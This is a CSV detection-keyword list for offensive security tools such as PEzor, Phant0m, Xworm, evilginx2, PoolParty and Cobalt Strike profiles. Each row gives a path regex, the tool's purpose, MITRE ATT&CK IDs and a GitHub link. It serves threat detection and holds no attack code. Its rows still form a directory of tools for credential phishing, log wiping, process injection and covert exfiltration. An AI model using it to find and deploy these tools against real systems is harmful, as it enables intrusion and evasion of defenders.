"*/PetitPotato.git*",".{0,1000}\/PetitPotato\.git.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*/PetitPotato-1.0.0.zip*",".{0,1000}\/PetitPotato\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*/PEzor.cna*",".{0,1000}\/PEzor\.cna.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/PEzor.git*",".{0,1000}\/PEzor\.git.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/PEzor.git*",".{0,1000}\/PEzor\.git.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/PEzor.sh *",".{0,1000}\/PEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/PEzor/inject.cpp*",".{0,1000}\/PEzor\/inject\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/pfsense_clickjacking*",".{0,1000}\/pfsense_clickjacking.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/pgsql-brute.nse*",".{0,1000}\/pgsql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Phant0m.git*",".{0,1000}\/Phant0m\.git.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*/phant0m-exe*",".{0,1000}\/phant0m\-exe.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*/PhishCreds.ps1*",".{0,1000}\/PhishCreds\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 
- T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/phishing.py*",".{0,1000}\/phishing\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/Phishing.sh*",".{0,1000}\/Phishing\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/phishing/*.html*",".{0,1000}\/phishing\/.{0,1000}\.html.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/phishing/password_box*",".{0,1000}\/phishing\/password_box.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/PhishingServer/*",".{0,1000}\/PhishingServer\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/phishlets/example.yaml*",".{0,1000}\/phishlets\/example\.yaml.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor 
authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*/php-backdoor.php*",".{0,1000}\/php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*/PHVNC.exe*",".{0,1000}\/PHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/PickleC2.git*",".{0,1000}\/PickleC2\.git.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*/pid:1337 */dll:*",".{0,1000}\/pid\:1337\s.{0,1000}\/dll\:.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*/PILOT/ATC.py*",".{0,1000}\/PILOT\/ATC\.py.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using 
ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","1","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*/PILOT/PILOT.ps1*",".{0,1000}\/PILOT\/PILOT\.ps1.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","1","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*/ping6.py*",".{0,1000}\/ping6\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/PingRAT.git*",".{0,1000}\/PingRAT\.git.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","1","N/A","10","10","82","12","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z" "*/PipeViewer.exe*",".{0,1000}\/PipeViewer\.exe.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - 
TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*/PipeViewer.git*",".{0,1000}\/PipeViewer\.git.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*/PipeViewer.sln*",".{0,1000}\/PipeViewer\.sln.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*/PipeViewer/Program.cs*",".{0,1000}\/PipeViewer\/Program\.cs.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*/pitty_tiger.profile*",".{0,1000}\/pitty_tiger\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/pivotnacci.git*",".{0,1000}\/pivotnacci\.git.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*/pivotnaccilib*",".{0,1000}\/pivotnaccilib.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*/pjl-info-config.nse*",".{0,1000}\/pjl\-info\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","61","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "*/pjl-ready-message.nse*",".{0,1000}\/pjl\-ready\-message\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pkg/merlin.go*",".{0,1000}\/pkg\/merlin\.go.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/pkg/state/sudoers.go*",".{0,1000}\/pkg\/state\/sudoers\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/PKINITtools*",".{0,1000}\/PKINITtools.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*/Plazmaz/LNKUp*",".{0,1000}\/Plazmaz\/LNKUp.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/Plugins/HRDP.dll*",".{0,1000}\/Plugins\/HRDP\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/Plugins/HVNC.dll*",".{0,1000}\/Plugins\/HVNC\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" 
"*/Plugins/PreventSleep.dll*",".{0,1000}\/Plugins\/PreventSleep\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/PoC/PrivilegeEscalation*",".{0,1000}\/PoC\/PrivilegeEscalation.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","135","26","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z" "*/POC_DLL.vcxproj*",".{0,1000}\/POC_DLL\.vcxproj.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/PoC-CVE-2023-21554*",".{0,1000}\/PoC\-CVE\-2023\-21554.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/poisoners/*.py",".{0,1000}\/poisoners\/.{0,1000}\.py","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/polenum.py*",".{0,1000}\/polenum\.py.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*/PoolParty.cpp*",".{0,1000}\/PoolParty\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/PoolParty.exe*",".{0,1000}\/PoolParty\.exe.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/PoolParty.git*",".{0,1000}\/PoolParty\.git.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/PoolParty.hpp*",".{0,1000}\/PoolParty\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" 
